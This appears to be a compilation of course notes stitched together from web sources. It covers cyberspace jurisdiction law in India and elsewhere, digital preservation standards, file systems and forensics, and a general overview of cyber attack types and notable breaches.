Contre Le Racisme Et L’Antisémitisme), which has received a lot of attention in the
popular press summarizes the difficulties that remain in resolving both the
prescriptive and enforcement jurisdictional issues in cyberspace.
It appears that courts and legislatures have found legitimate grounds for asserting
prescriptive jurisdiction over defendants based upon actions taken in cyberspace, but
that may have little importance when the plaintiff seeks a restorative remedy.
Enforcement jurisdiction, which requires the injured party to attach either the
defendant or his tangible assets, becomes an issue of comity or state’s recognition of
its obligation to enforce a law. [4]
“In sum, under U.S. law. if it is reasonable to do so, a court in one state will exercise
jurisdiction over a party in another state or country whose conduct has substantial
effects in the state and whose conduct constitutes sufficient contacts with the state to
satisfy due process. Because this jurisdictional test is ambiguous, courts in every state
of the U.S. may be able to exercise jurisdiction over parties anywhere in the world,
based solely on Internet contacts with the state.”[5]
Germany has passed a law that subjects any Web site accessible in Germany to
German law, holding Internet service providers (ISPs) liable for violations of German
content laws if the providers were aware of the content and were reasonably able to
remove the content. [6]
Malaysia’s new cyberspace law also extends well beyond the borders of Malaysia.
The bill applies to offenses committed by a person in any place, inside or outside of
Malaysia, if at the relevant time the computer, program, or data was either (i) in
Malaysia or (ii) capable of being connected to or sent to or used by or with a computer
in Malaysia. The offender is liable regardless of his nationality or citizenship. [7]
Personal Jurisdiction in Cyberspace- The Indian
Mechanism
Casio India Co. Limited v. Ashita Tele Systems Pvt. Limited the Supreme Court held
that “the website of Defendant can be accessed from Delhi is sufficient to invoke the
territorial jurisdiction of this Court”. [8]
In India TV Independent News Service Pvt. Limited v. India Broadcast Live Llc &
Ors., it was held that “the Defendant is carrying on activities within the jurisdiction of
this court; has sufficient contacts with the jurisdiction of the court and the claim of the
Plaintiff has arisen as a consequence of the activities of Defendant, within the
jurisdiction of this court”.
In Banyan Tree Holding (P) Limited v. A. Murali Krishna Reddy, The Division Bench
of the Delhi High Court, while answering the referral order of the learned Single
Judge, affirmed the ruling in India TV, and overruled the Casio Judgement. [9]
Various laws in India can be deemed applicable to today’s scenario of cyberspace and
everything that is involved with it. It is fascinating to notice how some of these laws,
though decades old, stand accurate to today’s circumstances.
Based on the Sections 15 to 20 of the Code of Civil Procedure, 1908, stipulating the
Indian approach to determining jurisdiction, the jurisdiction shall be detrimental to the
location of the immovable property, or the place of residence or place of the work of
the defendant or the place where the cause of action has arisen. These provisions stand
inapplicable for cyberspace disputes.
The provisions of the Code of Criminal Procedure, 1973 prescribes for multiple places
of jurisdiction based on the place of commission of crime or occurrence of the
consequence of a crime in cases of a continuing crime, which, in the case of
cyberspace, stands accurate.
The persisting laws relating to cyberspace are dealt under the Information Technology
Act, 2000, in India. The objective of the Act is to provide legal recognition to e-
commerce and to facilitate storage of electronic records with the Government.
The Act provides various definitions and instances of cybercrimes, prescribing the
punishment for those crimes and also provides laws for trial of cyber law cases in and
out of the country.
Sec 1 of the IT Act states that, this Act extends to the whole of India and, unless
otherwise provided, it shall also apply to any offence or contravention committed
outside India by any person.
Sec 75 of the IT Act deals with the provisions of the act to apply for offences or
contravention committed outside India, irrespective of his nationality, and shall apply
to an offence or contravention committed outside India by any person if the act or
conduct constituting the offence or contravention involves a computer, computer
system or computer network located in India.
As much as the Information Technology Act 2000 seems inclusive, it still does pose
ambiguity in jurisdiction when the offence has been committed outside of India or by
a non-citizen, while also following the principle of Lex Fori, meaning the law of the
country. [10]
A part of IT Act 2000, there are other relevant legislation under Indian laws that gives
the authority to India Courts to adjudicate the matters related to cyber-crimes such as:
Sec 3 and 4 of Indian Penal Code, 1882 that deals with extra territorial jurisdiction of
Indian courts.
Section 188 of the Code of Criminal Procedure, 1973 provides that even if a citizen of
India outside the country commits the offence, the same is subject to the jurisdiction
of courts in India.
And Section 178 deals with the crime or part of it committed in India and Section 179
deals with the consequences of crime in Indian Territory.
Conclusion
Cyberspace- a word gathered from fiction, yet has made its presence felt in reality, to
almost everyone. It is not a luxury, but a bare necessity for people of all ages and has
the entire world to offer, one simple click away.
Artsy and simplistic, is how cyberspace feels and how technology is evolving, giving
mankind its best, the crimes relating to cyberspaces are also on a drastic rise. The
more advanced the cyberspace gets, the more advanced its disputes. The existence of
a virtual space creates a cape of invisibility for those that wish to misuse this
innovation. It is detrimental to observe that since cyberspace and the internet are ever-
evolving entities, the laws to deal with mishaps occurring in these cyberspaces are
formulated long after the damage is done. The very nature of its consistent
development and ease of change, the laws and lawmakers are often stuck at war to
propose an accurate implementation of these offences. Oftentimes, these offences turn
grave and brutal, bringing threat to people’s safety, their lives, important military
information costing a nation’s security or frauds that steal money from a large number
of people- among others.
It is crucial to learn that creating a well-developed set of consistent laws are the only
solution to battle bigger evils that could arise out of cyberspace and its invisible
pursuit.
FAQs
1. Why Is There A Need To For Personal Jurisdiction In Cyberspace?
It is evident to note that cyberspace is a dynamic entity, and it advances by the second.
There is a newer innovation every day, making technology easier. But it comes with
its own set of innovative problems. The newer the innovations, the newer ways there
are to commit offences in cyberspace. It calls for a close inspection of cyberspace and
to regulate and reform the disputes in effective new ways with the help of effective
and newer laws.
References
https://blog.ipleaders.in/cyber-security-and-its-legal-implications/
Introduction
The use and development of reliable standards has long been a cornerstone of the information
industry. They facilitate the access, discovery and sharing of digital resources, as well as their long-
term preservation. There are both generic standards applicable to all sectors that can support digital
preservation, and industry-specific standards that may need to be adhered to. Using standards that
are relevant to the digital institutional environment helps with organisational compliance and
interoperability between diverse systems within and beyond the sector. Adherence to standards also
enables organisations to be audited and certified.
Operational standards
There are a number of standards which can help with the development of an operational model for
digital preservation.
Taking custodial control of digital materials requires a set of procedures to govern their transfer into
a digital preservation environment. This can include identifying and quantifying the materials to be
transferred, assessing the costs of preserving them and identifying the requirements for future
authentication and confidentiality. ISO 20652: Space Data and Information Transfer Systems -
Producer-Archive Interface - Methodology Abstract Standard (ISO, 2006) is an international standard
that provides a methodological framework for developing procedures for the formal transfer of digital
materials from the creator into the digital preservation environment. Objectives, actions and the
expected results are identified for four phases - initial negotiations with the creator (Preliminary
Phase), defining requirements (Formal Definition Phase), the transfer of digital materials to the
digital preservation environment (Transfer Phase) and ensuring the digital materials and their
accompanying metadata conform to what was agreed (Validation Phase).
ISO 14721:2012 Space Data and Information Transfer Systems - Open Archival Information System
- Reference Model (OAIS) (ISO, 2012b) provides a systematic framework for understanding and
implementing the archival concepts needed for long-term digital information preservation and
access, and for describing and comparing architectures and operations of existing and future
archives. It describes roles, processes and methods for long-term preservation. Developed by the
Consultative Committee for Space Data Systems (CCSDS) OAIS was first published in 1999 and
has had an influence upon many digital preservation developments since the early 2000s. A useful
introductory guide to the standard is available as a DPC Technology Watch Report (Lavoie, 2014).
An OAIS is ‘an archive, consisting of an organization of people and systems that has accepted the
responsibility to preserve information and make it available for a defined ‘Designated Community’.
An ‘OAIS archive’ could be distinguished from other uses of the term ‘archive’ by the way that it
accepts and responds to a series of specific responsibilities. OAIS defines these responsibilities as:
OAIS also defines the information model that needs to be adopted. This includes not only the digital
material but also any metadata used to describe or manage the material and any other supporting
information called Representation Information.
The OAIS functional model is widely used to establish workflows and technical implementations. It
defines a broad range of digital preservation functions including ingest, access, archival storage,
preservation planning, data management and administration. These provide a common set of
concepts and definitions that can assist discussion across sectors and professional groups and
facilitate the specification of archives and digital preservation systems.
OAIS provides a high level framework and a useful shared language for digital preservation but for
many years the concept of ‘OAIS conformance/compliance’ remained hard to pin down. Though the
term was frequently used in the years immediately following the publication of the standard, it relied
on the ability to measure up to just six mandatory but high level responsibilities. A more detailed
discussion about ‘OAIS compliance’ can be found in the Technology Watch Report.
ISO 15489:2001 Information and documentation -- Records management (ISO, 2001) can also be a
useful standard for defining the roles, processes and methods for a digital preservation
implementation where the focus is the long-term management of records. This standard outlines a
framework of best practice for managing business records to ensure that they are curated and
documented throughout their lifecycle while remaining authoritative and accessible.
ISO 16175:2011 Principles and functional requirements for records in electronic office environments
(ISO, 2011) relates to electronic document and records management systems as well as enterprise
content management systems. While it does not include specific requirements for digital
preservation, it does acknowledge the need to maintain records over time and that format
obsolescence issues need to be considered in the specification of these electronic systems.
There are international standards that are generic to good business management that may also be
relevant in the digital preservation domain.
Certification against ISO 9001 Quality management systems (ISO, 2015) demonstrates an
organisation’s ability to provide and improve consistent products and services.
Certification against ISO/IEC 27001 Information technology -- Security techniques -- Information
security management systems (ISO/IEC, 2013) demonstrates that digital materials are securely
managed ensuring their authenticity, reliability and usability.
ISO/IEC 15408 The Common Criteria for Information Technology Security Evaluation (ISO/IEC,
2009) provides a standardised framework for specifying functional and assurance requirements for IT
security and a rigorous evaluation of these.
There are a number of routes through which a digital preservation implementation can be certified.
These range from light touch peer review certification methods such as the Data Seal of Approval,
through the more extensive internal methods of DIN 31644 Information and documentation - Criteria
for trustworthy digital archives (DIN, 2012), to the comprehensive international standard ISO
16363:2012 Audit and certification of trustworthy digital repositories (ISO, 2012a) (see Audit and
certification).
Technical standards
There are specific advantages to using standards for the technical aspects of a digital preservation
programme, primarily in relation to metadata and file formats.
In conjunction with relevant descriptive metadata standards, PREMIS and METS are de facto
standards which will enhance a digital preservation programme. PREMIS (PREservation Metadata:
Implementation Strategies) is a standard hosted by the Library of Congress and first published in
2005. The data dictionary and supporting tools have been specifically developed to support the
preservation of digital material. METS (Metadata Encoding and Transmission Standard) is an XML
encoding standard which enables digital materials to be packaged with archival information
(see Metadata and documentation).
There are also standards relating to file formats. Choosing file formats that are non-proprietary and
based on open format standards gives an organisation a good basis for a digital preservation
programme. ISO/IEC 26300-1:2015 Open Document Format for Office Applications (ISO/IEC, 2015)
provides an XML schema for the preservation of widely used documents such as text documents,
spreadsheets, presentations. ISO 19005 Electronic document file format for long-term preservation
(ISO, 2005) prescribes elements of valid PDF/A which ensures that they are self-contained and
display consistently across different devices. Aspects of JPEG-2000 and TIFF are also covered by
ISO standards. (see File formats and standards).
Barriers to using standards
A standards based approach to digital preservation is important, but there are also factors which
inhibit their use as a digital preservation strategy:
The pace of change is so rapid that standards which have reached the stage of being formally endorsed
- a process which usually takes years - will inevitably lag behind developments and may even be
superseded.
Competitive pressures between suppliers encourage the development of proprietary extensions to, or
implementations of standards which can dilute the advantages of consistency and interoperability for
preservation.
The standards themselves adapt and change to new technological environments, leading to a number
of variations of the original standard which may or may not be interoperable in the long-term even if
they are backwards compatible in the short-term.
Standards can be intimidating to read and resource intensive to implement.
In such a changeable and highly distributed environment, it is impossible to be completely
prescriptive.
These factors mean that standards will need to be seen as part of a suite of preservation strategies
rather than the key strategy itself. The digital environment is not inclined to be constrained by rigid
rules and a digital preservation programme can often be a blend of standards and best practice that
is sufficiently flexible and adapted to suit the needs of the organisation, its circumstances and the
digital materials being managed.
In recent years best practice guidance and case studies have been published by national archives,
national libraries and other cultural organisations. Digital preservation is also a topic well discussed
on blogs and social media which can often provide real time information in relation to theory and
practice from around the world. Papers at conferences such as iPRES, the International Digital
Curation Conference (IDCC) and the Preservation and Archiving Special Interest Group (PASIG)
can be a useful source of up to date thinking from academics and practitioners in digital
preservation.
Specific industries have become active in the development of preservation standards, and particular
types of content and use cases have emerged that overlap and extend a number of standards.
There is considerable benefit in digital preservation standards being embedded in sector-specific
standards since this will greatly assist their adoption, although this may present a challenge to
coordination of activities. Three examples are given below:
1. Audio visual materials present a special case for digital preservation (see Moving pictures and
sounds). Recommendations for audio recordings and video recordings exist under the auspices of the
International Association of Sound and Audio-visual Archives (such as IASA- TC04, 2009), while a
range of industry bodies and content holders including the BBC, RAI, ORF and INA have formed the
PrestoCentre to progress research and development of preservation standards in this
field. https://www.prestocentre.org/
2. The aerospace industry has particular requirements in product lifecycle management and information
exchange which have given rise to a series of industry wide initiatives to standardise approaches to
aligning and sharing CAD drawings for engineering. The membership body PROSTEP created the
ISO 10303 ‘Standard for Exchange of Product Model Data’ which has developed into the LOTAR
standard (http://www.lotar-international.org/lotar-standard/overview-on-parts.html). LOTAR is
not incompatible with OAIS, but because it fits within a data exchange protocol important to the
industry, aerospace engineers are more likely to encounter LOTAR than OAIS
3. .The Storage Network Industry Association has also begun to make progress on the development of a
series of standards. A SNIA working group on long-term data retention has responsibility for both
physical and logical preservation, and the creation of reference architectures, services and interfaces
for preservation. In addition, a working group on Cloud Storage is likely to become particularly
influential in relation to preservation. Cloud architectures change how organizations view repositories
and how they access services to manage them. For example, it is unclear how one would measure the
success of a ‘trusted digital repository’ that was based in a cloud provider.
Resources
http://jennriley.com/metadatamap/
The sheer number of metadata standards in the cultural heritage sector is overwhelming, and their
inter-relationships further complicate the situation. This visual map of the metadata landscape is
intended to assist planners with the selection and implementation of metadata standards. Each of
the 105 standards listed here is evaluated on its strength of application to defined categories in each
of four axes: community, domain, function, and purpose. (2010, 1 page).
Dlib Magazine
http://www.dlib.org/dlib.html
Dlib Magazine publishes on a regular basis a wide range of papers and case studies on the practical
implementation of digital preservation standards and best practice.
Core Trust Seal
https://www.coretrustseal.org/
PREMIS
http://www.loc.gov/standards/premis/
http://www.dcc.ac.uk/
The Digital Curation Centre makes available research and case studies in relation to the
preservation of research data. Iit also publishes recordings of its annual international digital curation
conference proceedings.
The Signal
http://blogs.loc.gov/digitalpreservation/
IPRES
http://www.ipres-conference.org/
IPRES, the International Conference on Digital Preservation publishes a website and proceedings
from their annual event which looks at different themes within the digital preservation landscape,
http://wiki.dpconline.org/index.php?title=Main_Page
The Digital Preservation Coalition Wiki provides a collaborative space for users of OAIS, the British
Library’s file format assessments as well as other resources.
http://preservationmatters.blogspot.co.uk/
The Digital Preservation Matters blog is a personal account of experiences from working with Digital
Preservation
2.Evidence Analysis
Share:
A file system in a computer is the manner in which files are named and
logically placed for storage and retrieval. It can be considered as a
database or index that contains the physical location of every single
piece of data on the respective storage device, such as hard disk, CD,
DVD or a flash drive. This data is organized in folders, which are called
directories. These directories further contain folders and files.
For storing and retrieving files, file systems make use of metadata,
which includes the date the file was created, data modified, file size,
and so on. They can also restrict users from accessing a particular file
by using encryption or a password.
Build your skills with hands-on forensics training for computers, mobile
devices, networks and more.
Start Learning
File Name
o FAT file system in Windows supports long file name, with full file path being
as long as 255 characters
o File names can have more than one period and spaces. Characters that come
after the last period in full file name are considered as the file extension.
FAT file system does not support folder and local security. This means users
logged into a computer locally will gain complete access to folders and files
that lie in FAT partitions.
It provides fast access to files. The rate depends upon the size of partition,
file size, type of file and number of files in the folder.
This is an advanced version of the FAT File system and can be used on
drives ranging from 512 MB to 2 TB.
Features
Easier access of files in partitions less than 500 MB or greater than 2GB in
size
The figure below shows partitioning layout in FAT and FAT 32 file
systems.
NTFS File System
The NTFS File System stands for New Technology File System.
Features
Naming
Files and partition sizes are larger in NTFS than those of FAT. An NTFS
partition can be of a size as large as 16 Exabytes, but practically it is limited
to 2TB. File size can range from 4GB to 64 GB.
It provides bad-cluster mapping. This means that it can detect bad clusters
or erroneous space in the disk, retrieve the data in those clusters, and then
store it in another space. To avoid further data storage in those areas, bad
clusters are marked for errors.
Extended file system (EXT), Second Extended file system (EXT2) and
Third Extended file system (EXT3) are designed and implemented on
Linux. The EXT is an old file system that was used in pioneer Linux
systems. EXT2 is probably one of the most widely used Linux file
systems. EXT 3 also includes same features as EXT 2, but also
includes journaling.
Here we will talk about the most commonly used EXT2. With the
optimizations in kernel code, it provides robustness along with good
performance whilst providing standard and advanced Unix file
features.
Features
Supports standard file types in Unix i.e. regular files, device special files,
directories, symbolic links
Can manage file systems created on huge partitions. Originally, file system
size was restricted to 2 GB, but with recent work in VFS layer, this limit has
now increased to 4 TB.
Allows for secure deletion of files. Once data is deleted, the space is
overwritten with random data to prevent malicious users from gaining
access to the previous data.
A file format is a layout and organization of data within the file. If a file
is to be used by a program, it must be able to recognize and have
access to the data in the file. For instance, a text document can be
recognized by a program such as Microsoft that is designed to run text
files but not by a program that is designed to run audio or video files.
A file format is indicated along with the file name in the form of a file
extension. The extension contains three or four letters identifying the
format and is separated from the file name by a period.
There are many types of file formats that have their respective
programs for processing the files. Some of the common file formats
are:
Disk image file containing all the files and folders on a disk (.iso)
Compressed files that combine a number of files into one single file (.zip
and .rar)
Acquisition
The system should be secured to ensure that all data and equipment
stays safe. In other words, all media required for forensic analysis
should be acquired and kept safe from any unauthorized access. Find
out all files on the computer system including encrypted, password-
protected, hidden and deleted (but not overwritten) files. These files
must be acquired from all storage media that include hard drive and
portable media. Once acquired, forensic investigators have to make a
copy of them so that the original files are kept intact without the risk
of alteration.
Logical: it captures only the files that are of interest to the case. Used when
time is limited.
Extraction
Reconstruction
Build your skills with hands-on forensics training for computers, mobile
devices, networks and more.
Start Learning
Reporting
To know more about computer and mobile system forensics, you might
be interested in the following resources:
Our Computer Forensics Boot
Camp: https://www.infosecinstitute.com/courses/computer-forensics-boot-
camp/?utm_source=resources&utm_medium=infosec
%20network&utm_campaign=course%20pricing&utm_content=hyperlink
b)Application forensics
APPLICATION
FORENSICS
Balancing the need for speed and careful, methodical steps.
When you suspect that an application has been compromised or a data breach has occurred, it’s
important to act quickly to preserve evidence and identify the root cause. Application forensics
involves forensic examination of applications and their contents (such as logs, security event
monitoring, databases, and config files) to trace the origin of the attack.
There are a number of specific attributes that make application forensics a specialized
discipline:
o Modern-day applications are often distributed across multiple servers, or even multiple
datacenters or cloud providers.
o Applications are often mission-critical for the business, and cannot be taken offline for image
capture and investigation.
o Applications are often backed by large databases that reside on a complex storage layer
with many physical disks.
o Application attacks don’t naturally leave a trail of evidence like other forms of attack.
c) Web forensics
Web Forensics
This leaves a trail of evidence both on the client side (e.g., registry
entries, temporary files, index.dat, cookies, favorites, a list of visited
sites or partial website data downloaded to the local browser cache)
and also on the server side (e.g., during log analysis on a server, you
may save precious registers such as the perpetrator IP Address, a
timestamp for each visit, what information was posted, etc.). Again, if
you have the proper tools and knowledge, once you gather this sort of
evidence, it is a great step towards building a strong case.
d) Network forensics
Share:
Most attacks move through the network before hitting the target and
they leave some trace. According to Locard’s exchange principle,
“every contact leaves a trace,” even in cyberspace.
Data enters the network en masse but is broken up into smaller pieces
called packets before traveling through the network. In order to
understand network forensics, one must first understand internet
fundamentals like common software for communication and search,
which includes emails, VOIP services and browsers. One must also
know what ISP, IP addresses and MAC addresses are.
File transfer protocols (e.g., Server Message Block/SMB and Network File
System/NFS)
Methods
“Stop, look and listen” method: Administrators watch each data packet that
flows across the network but they capture only what is considered
suspicious and deserving of an in-depth analysis. While this method does not
consume much space, it may require significant processing power
Primary sources
Log files: These files reside on web servers, proxy servers, Active Directory
servers, firewalls, Intrusion Detection Systems (IDS), DNS and Dynamic Host
Control Protocols (DHCP). Unlike full-packet capture, logs do not take up so
much space
Log files provide useful information about activities that occur on the
network, like IP addresses, TCP ports and Domain Name Service
(DNS). Log files also show site names which can help forensic experts
see suspicious source and destination pairs, like if the server is
sending and receiving data from an unauthorized server somewhere in
North Korea. In addition, suspicious application activities — like a
browser using ports other than port 80, 443 or 8080 for communication
— are also found on the log files. Log analysis sometimes requires both
scientific and creative processes to tell the story of the incident.
Tools
Free software tools are available for network forensics. Some are
equipped with a graphical user interface (GUI). Most though, only have
a command-line interface and many only work on Linux systems.
EMailTrackerPro shows the location of the device from which the email is
sent
Web Historian provides information about the upload/download of files on
visited websites
Legal considerations
Privacy and data protection laws may pose some restrictions on active
observation and analysis of network traffic. Without explicit
permission, using network forensics tools must be in line with the
legislation of a particular jurisdiction. Permission can be granted by a
Computer Security Incident Response Team (CSIRT) but a warrant is
often required.
unit 5
1. Attacks
a) Computer attacks
What is a cyber attack?
A cyber attack is any attempt to gain unauthorized access to a computer, computing
system or computer network with the intent to cause damage. Cyber attacks aim to
disable, disrupt, destroy or control computer systems or to alter, block, delete, manipulate
or steal the data held within these systems.
Any individual or group can launch a cyber attack from anywhere by using one or more
various attack strategies.
People who carry out cyber attacks are generally regarded as cybercriminals. Often
referred to as bad actors, threat actors and hackers, they include individuals who act
alone, drawing on their computer skills to design and execute malicious attacks. They can
also belong to a criminal syndicate, working with other threat actors to find weaknesses
or problems in the computer systems -- called vulnerabilities -- that they can exploit for
criminal gain.
Financial gain. Cybercriminals launch most cyber attacks, especially those against
commercial entities, for financial gain. These attacks often aim to steal sensitive data,
such as customer credit card numbers or employee personal information, which the
cybercriminals then use to access money or goods using the victims' identities.
Other financially motivated attacks are designed to disable computer systems, with
cybercriminals locking computers so owners and authorized users cannot access the
applications or data they need; attackers then demand that the targeted organizations pay
them ransoms to unlock the computer systems.
Still, other attacks aim to gain valuable corporate data, such as propriety information;
these types of cyber attacks are a modern, computerized form of corporate espionage.
Disruption and revenge. Bad actors also launch attacks specifically to sow chaos,
confusion, discontent, frustration or mistrust. They could be taking such action as a way
to get revenge for acts taken against them. They could be aiming to publicly embarrass
the attacked entities or to damage the organizations' reputations. These attacks are often
directed at government entities but can also hit commercial entities or nonprofit
organizations.
Insider threats are attacks that come from employees with malicious intent.
Cyberwarfare. Governments around the world are also involved in cyber attacks, with
many national governments acknowledging or suspected of designing and executing
attacks against other countries as part of ongoing political, economic and social disputes.
These types of attacks are classified as cyberwarfare.
In an untargeted attack, where the bad actors are trying to break into as many devices or
systems as possible, they generally look for vulnerabilities in software code that will
enable them to gain access without being detected or blocked. Or, they might employ
a phishing attack, emailing large numbers of people with socially engineered messages
crafted to entice recipients to click a link that will download malicious code.
In a targeted attack, the threat actors are going after a specific organization, and the
methods used vary depending on the attack's objectives. The hacktivist group
Anonymous, for example, was suspected in a 2020 distributed denial-of-service (DDoS)
attack on the Minneapolis Police Department website after a Black man died while being
arrested by Minneapolis officers. Hackers also use spear-phishing campaigns in a
targeted attack, crafting emails to specific individuals who, if they click included links,
would download malicious software designed to subvert the organization's technology or
the sensitive data it holds.
Cyber criminals often create the software tools to use in their attacks, and they frequently
share those on the so-called dark web.
Cyber attacks often happen in stages, starting with hackers surveying or scanning for
vulnerabilities or access points, initiating the initial compromise and then executing the
full attack -- whether it's stealing valuable data, disabling the computer systems or both.
In fact, most organizations take months to identify an attack underway and then contain
it. According to the "2022 Cost of a Data Breach" report from IBM, organizations with
fully deployed artificial intelligence and automation security tools took an average of 181
days to identify a data breach and another 68 days to contain it, for a total of 249 days.
Organizations with partially deployed AI and automation took a total of 299 days to
identify and contain a breach, while those without AI and automation took an average of
235 days to identify a breach and another 88 days to contain it, for a total of 323 days.
2. Phishing occurs when hackers socially engineer email messages to entice recipients
to open them. The messages trick recipients into downloading the malware within
the email by either opening an attached file or embedded link. The "2022 State of
the Phish" report from cybersecurity and compliance company Proofpoint found
that 83% of survey respondents said their organization experienced at least one
successful phishing attack in 2021, up 46% over 2020. Moreover, the survey also
revealed that 78% of organizations saw an email-based ransomware attack in 2021.
6. SQL injection occurs when hackers insert malicious code into servers using
the Structured Query Language programming language to get the server to reveal
sensitive data.
7. Zero-day exploit happens when hackers first exploit a newly identified vulnerability
in IT infrastructure. For example, a series of critical vulnerabilities in a widely used
piece of open source software, the Apache Log4j Project, was reported in December
2021, with the news sending security teams at organizations worldwide scrambling
to address them.
10. Credential-based attacks happen when hackers steal the credentials that IT workers
use to access and manage systems and then use that information to illegally access
computers to steal sensitive data or otherwise disrupt an organization and its
operations.
11. Credential stuffing takes place when attackers use compromised login credentials
(such as an email and password) to gain access to other systems.
12. Brute-force attack in which hackers employ trial-and-error methods to crack login
credentials such as usernames, passwords and encryption keys, hoping that the
multiple attempts pay off with a right guess.
How can you prevent a cyber attack?
There is no guaranteed way for any organization to prevent a cyber attack, but there are
numerous cybersecurity best practices that organizations can follow to reduce the risk.
Reducing the risk of a cyber attack relies on using a combination of skilled security
professionals, processes and technology.
Tips for
security professionals and employees on how to improve cybersecurity
What are the most well-known cyber attacks?
Cyber attacks have continued to increase in sophistication and have had significant
impacts beyond just the companies involved.
That came just weeks after another impactful cyberattack. Hackers hit Colonial Pipeline
in May 2021 with a ransomware attack. The attack shut down the largest fuel pipeline in
the United States, leading to fuel shortages along the East Coast.
Several months before that, the massive SolarWinds attack breached U.S. federal
agencies, infrastructure and private corporations in what is believed to be among the
worst cyberespionage attacks inflicted on the U.S. On Dec. 13, 2020, Austin-based IT
management software company SolarWinds was hit by a supply chain attack that
compromised updates for its Orion software platform. As part of this attack, threat actors
inserted their own malware, now known as Sunburst or Solorigate, into the updates,
which were distributed to many SolarWinds customers.
The first confirmed victim of this backdoor was cybersecurity firm FireEye, which
disclosed on Dec. 8 that it was breached by suspected nation-state hackers. It was soon
revealed that SolarWinds attacks affected other organizations, including tech giants
Microsoft and VMware, as well as many U.S. government agencies. Investigations
showed that the hackers -- believed to be sponsored by the Russian government -- had
been infiltrating targeted systems undetected since March 2020.
Here is a rundown of some of the most notorious breaches, dating back to 2009:
a July 2020 attack on Twitter, in which hackers were able to access the Twitter
accounts of high-profile users;
the Feb. 2018 breach at Under Armour's MyFitnessPal (Under Armour has since sold
MyFitnessPal), which exposed email addresses and login information for 150 million
user accounts;
the May 2017 WannaCry ransomware attack, which hit more than 300,000
computers across various industries in 150 nations, causing billions of dollars of
damage;
the September 2017 Equifax breach, which saw the personal information of 145
million individuals compromised;
the Petya attacks in 2016, which were followed by the NotPetya attacks of 2017,
which hit targets around the world, causing more than $10 billion in damage;
another 2016 attack, this time at FriendFinder, which said more than 20 years' worth
of data belonging to 412 million users was compromised;
a data breach at Yahoo in 2016 that exposed personal information contained within
500 million user accounts, which was then followed by news of another attack that
compromised 1 billion user accounts;
eBay's May 2014 announcement that hackers used employee credentials to collect
personal information on its 145 million users;
the 2013 breach suffered by Target Corp., in which the data belonging to 110 million
customers was stolen; and
the Heartland Payment Systems data breach, announced in January 2009, in which
information on 134 million credit cards was exposed.
Cyber attack trends
The volume, cost and impact of cyber attacks continue to grow each year, according to
multiple reports.
Consider the figures from one 2022 report. The "Cybersecurity Solutions for a Riskier
World" report from ThoughtLab noted that the number of material breaches suffered by
surveyed organizations jumped 20.5% from 2020 to 2021. Yet, despite executives and
board members paying more attention -- and spending more -- on cybersecurity than ever
before, 29% of CEOs and CISOs and 40% of chief security officers said their
organization is unprepared for the ever-evolving threat landscape.
The report further notes that security experts expect the volume of attacks to continue
their climb.
The types of cyber attacks, as well as their sophistication, also grew during the first two
decades of the 21st century -- particularly during the COVID pandemic when, starting in
early 2020, organizations enabled remote work en masse and exposed a host of potential
attack vectors in the process.
Consider, for example, the growing number and type of attack vectors -- that is, the
method or pathway that malicious code uses to infect systems -- over the years.
The first virus was invented in 1986, although it wasn't intended to corrupt data in the
infected systems. Cornell University graduate student Robert Tappan Morris created the
first worm distributed through the internet, called the Morris worm, in 1988.
Then came Trojan horse, ransomware and DDoS attacks, which became more destructive
and notorious with names such as WannaCry, Petya and NotPetya -- all ransomware
attack vectors.
Hackers also adopted more sophisticated technologies throughout the first decades of the
21st century, using machine learning and artificial intelligence, as well as bots and other
robotic tools, to increase the velocity and volume of their attacks.
And they developed more sophisticated phishing and spear-phishing campaigns, even as
they continued to go after unpatched vulnerabilities; compromised credentials, including
passwords; and misconfigurations to gain unauthorized access to computer systems.
b) Network attacks
Network attacks are unauthorized actions on the digital assets within an organizational
network. Malicious parties usually execute network attacks to alter, destroy, or steal
private data. Perpetrators in network attacks tend to target network perimeters to gain
access to internal systems.
There are two main types of network attacks: passive and active. In passive network
attacks, malicious parties gain unauthorized access to networks, monitor, and steal
private data without making any alterations. Active network attacks involve modifying,
encrypting, or damaging data.
Upon infiltration, malicious parties may leverage other hacking activities, such as
malware and endpoint attacks, to attack an organizational network. With more
organizations adopting remote working, networks have become more vulnerable to data
theft and destruction.
Modern organizations rely on the internet for communication, and confidential data is
often exchanged between networks. Remote accessibility also provides malicious
parties with vulnerable targets for data interception. These may violate user privacy
settings and compromise devices connected to the internet.
Network attacks occur in various forms. Enterprises need to ensure that they maintain
the highest cybersecurity standards, network security policies, and staff training to
safeguard their assets against increasingly sophisticated cyber threats.
DDoS
Man-in-the-middle Attacks
Unauthorized Access
Unauthorized access refers to network attacks where malicious parties gain access to
enterprise assets without seeking permission. Such incidences may occur due to weak
account password protection, unencrypted networks, insider threats that abuse role
privileges, and the exploitation of inactive roles with administrator rights.
Organizations should prioritize and maintain the least privilege principle to avoid the
risks of privilege escalation and unauthorized access.
SQL Injection
Unmoderated user data inputs could place organizational networks at risk of SQL
injection attacks. Under the network attack method, external parties manipulate forms
by submitting malicious codes in place of expected data values. They compromise the
network and access sensitive data such as user passwords.
There are various SQL injection types, such as examining databases to retrieve details
on their version and structure and subverting logic on the application layer, disrupting its
logic sequences and function.
Network users can reduce the risks of SQL injection attacks by implementing
parameterized queries/prepared statements, which helps verify untrusted data inputs.
Network attacks remain a lingering issue for organizations as they transition to remote
operations with increased reliance on confidential network communications. Recent
network attacks demonstrate that malicious parties may strike at the least expected
moment. So, cyber vigilance and security should be a priority across all industries.
Social Engineering
Some network attacks may involve advanced persistent threats (APTs) from a team of
expert hackers. APT parties will prepare and deploy a complex cyber-attacks program.
This exploits multiple network vulnerabilities while remaining undetected by network
security measures such as firewalls and antivirus software.
Ransomware
In ransomware attacks, malicious parties encrypt data access channels while
withholding decryption keys, a model that enables hackers to extort affected
organizations. Payment channels usually include untraceable cryptocurrency accounts.
While cybersecurity authorities discourage paying off malicious parties, some
organizations continue to do so as a quick solution in regaining data access.
The NGFW’s real-time monitoring interface enables users to react quickly to the
slightest network anomalies without delay, with a clear breakdown of ongoing
processes. NGFW prioritizes critical networks and devices while identifying the most
evasive network attacks that bypass conventional firewalls.
Avoid camouflaged network attacks with a firewall solution built to close the evasion
gap. Experience the Forcepoint method to optimize your enterprise data security
standards through its digital transformation.
c) System attacks
Tushar Panhalkar
Director and Lead Trainer at INFOSAVVY
98 articles Follow
June 9, 2020
Many approaches exist to gain access are different types of attacks on a system. One
common requirement for all such approaches is that the attacker finds and exploits a
system’s weakness or vulnerability.
Today’s Operating Systems (OS) are loaded with features and are increasingly complex.
While users take advantage of these features, they are prone to more vulnerabilities,
thus enticing attackers. Operating systems run many services such as graphical user
